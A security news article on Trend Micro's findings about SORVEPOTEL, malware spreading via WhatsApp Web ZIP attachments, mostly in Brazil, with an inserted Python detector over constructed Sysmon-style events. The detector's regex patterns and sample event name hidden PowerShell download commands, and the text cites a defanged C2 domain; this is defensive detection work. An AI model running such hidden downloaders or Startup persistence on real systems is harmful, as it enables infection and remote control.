Malware Spreads Through Malicious WhatsApp Attachments
According to Trend Micro researchers Jeffrey Francis Bonaobra, Maristel Policarpio, Sophia Nilette Robles, Cj Arsley Mateo, Jacob Santos, and Paul John Bardon, SORVEPOTEL spreads via phishing messages containing malicious ZIP file attachments sent through WhatsApp.
“SORVEPOTEL has been observed to spread across Windows systems through convincing phishing messages with malicious ZIP file attachments,” the researchers explained. “Interestingly, the phishing message requires users to open it on a desktop, suggesting that threat actors might be more interested in targeting enterprises rather than consumers.”
Once the infected ZIP file is opened, the malware automatically propagates through the desktop web version of WhatsApp. This behavior results in affected accounts being banned for excessive spam activity. Trend Micro has found no evidence that the attackers are exfiltrating data or deploying ransomware.
Brazil Hit Hardest by the SORVEPOTEL Campaign
Out of the 477 recorded infections, a significant majority — 457 cases — have been identified in Brazil. The most affected industries include government, public service, manufacturing, technology, education, and construction.
The attack begins with a phishing message sent from an already compromised contact, lending it credibility. The attached ZIP file masquerades as a legitimate receipt or health-related document, tricking users into opening it on their desktop systems.
Technical Details: PowerShell and Persistence Mechanisms
Upon opening the ZIP file, users are prompted to launch a Windows shortcut (LNK) file. When executed, the shortcut triggers a hidden PowerShell script that downloads the main malware payload from a remote server (for example, sorvetenopoate[.]com).
The downloaded payload is a batch script that copies itself into the Windows Startup folder to ensure it runs automatically after each system reboot. It also executes a PowerShell command that connects to a remote command-and-control (C2) server to receive additional instructions or payloads.
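The two stages described above (a hidden PowerShell downloader launched from the shortcut, then a batch file dropped into the Startup folder) give a defender a concrete chain to correlate in endpoint telemetry. The following is an added example, not code from the article or from Trend Micro's report; it runs over constructed, Sysmon-style events (field names and values are assumptions, including the placeholder domain and paths) and flags hosts where both stages occur within a short window.

```python
import re
from datetime import datetime, timedelta

# Constructed, simplified Sysmon-style events (not real telemetry). Field names
# follow Sysmon conventions; hosts, paths and the URL are made up for this example.
SAMPLE_EVENTS = [
    {"time": "2025-10-01T10:00:01", "host": "ws-01", "type": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\explorer.exe",   # shortcut opened from the desktop
     "cmdline": 'powershell.exe -WindowStyle Hidden -c "Invoke-WebRequest http://example.invalid/p"'},
    {"time": "2025-10-01T10:00:04", "host": "ws-01", "type": "FileCreate",
     "image": r"C:\Windows\System32\cmd.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\update.bat"},
    {"time": "2025-10-01T11:30:00", "host": "ws-02", "type": "ProcessCreate",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell.exe -File C:\scripts\inventory.ps1"},  # benign admin script
]

# Stage 1: PowerShell started with a hidden window that also fetches something from the web.
HIDDEN_DOWNLOADER = re.compile(
    r"-w(indowstyle)?\s+hidden.*?(invoke-webrequest|iwr|downloadstring|downloadfile|curl|wget)", re.I)
# Stage 2: a .bat/.cmd file written into a per-user Startup folder (reboot persistence).
STARTUP_BAT = re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.(bat|cmd)$", re.I)

def stage_of(event):
    """Map one event to a stage of the chain, or None if it matches neither."""
    if event["type"] == "ProcessCreate" and event["image"].lower().endswith("powershell.exe"):
        if HIDDEN_DOWNLOADER.search(event["cmdline"]):
            return "hidden_powershell_download"
    if event["type"] == "FileCreate" and STARTUP_BAT.search(event["target"]):
        return "startup_batch_persistence"
    return None

def find_chains(events, window=timedelta(minutes=10)):
    """Return hosts where a hidden download is followed, within `window`, by a
    batch file landing in Startup. Either stage alone is noisy; both together
    on one host closely mirror the infection chain described in the article."""
    hits = {}
    for e in events:
        stage = stage_of(e)
        if stage:
            hits.setdefault(e["host"], []).append((datetime.fromisoformat(e["time"]), stage))
    alerts = []
    for host, staged in hits.items():
        downloads = [t for t, s in staged if s == "hidden_powershell_download"]
        persists = [t for t, s in staged if s == "startup_batch_persistence"]
        if any(timedelta(0) <= p - d <= window for d in downloads for p in persists):
            alerts.append(host)
    return sorted(alerts)
```

Calling `find_chains(SAMPLE_EVENTS)` returns `['ws-01']`; the ordinary scheduled PowerShell run on ws-02 matches neither stage and is not reported.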
WhatsApp Propagation Mechanism
The standout feature of SORVEPOTEL is its ability to spread through WhatsApp Web. If the malware detects that WhatsApp Web is active on the infected computer, it automatically sends the malicious ZIP file to all the user’s contacts and groups. This self-spreading technique enables rapid propagation with minimal user interaction.
“This automated spreading results in a high volume of spam messages and frequently leads to account suspensions or bans due to violations of WhatsApp’s terms of service,” Trend Micro said.
Growing Trend of Malware Leveraging Communication Platforms
The SORVEPOTEL campaign highlights a growing trend in cybercrime — attackers increasingly exploiting trusted communication platforms to maximize reach. By leveraging popular tools like WhatsApp, threat actors can achieve rapid, large-scale infection with little to no user engagement.
“The SORVEPOTEL campaign demonstrates how threat actors are increasingly leveraging popular communication platforms like WhatsApp to achieve rapid, large-scale malware propagation with minimal user interaction,” Trend Micro concluded.
Protecting Against SORVEPOTEL and Similar Threats
- Avoid opening ZIP or LNK attachments from unknown or unexpected senders, even if they appear to come from trusted contacts.
- Use endpoint protection and keep your antivirus software up to date.
- Verify suspicious messages through a different communication channel before opening attachments.
- Ensure your Windows systems and PowerShell configurations follow security best practices.
As messaging platforms continue to be targeted for malware distribution, both enterprises and individual users must stay alert to phishing and social engineering tactics designed to exploit trust and familiarity.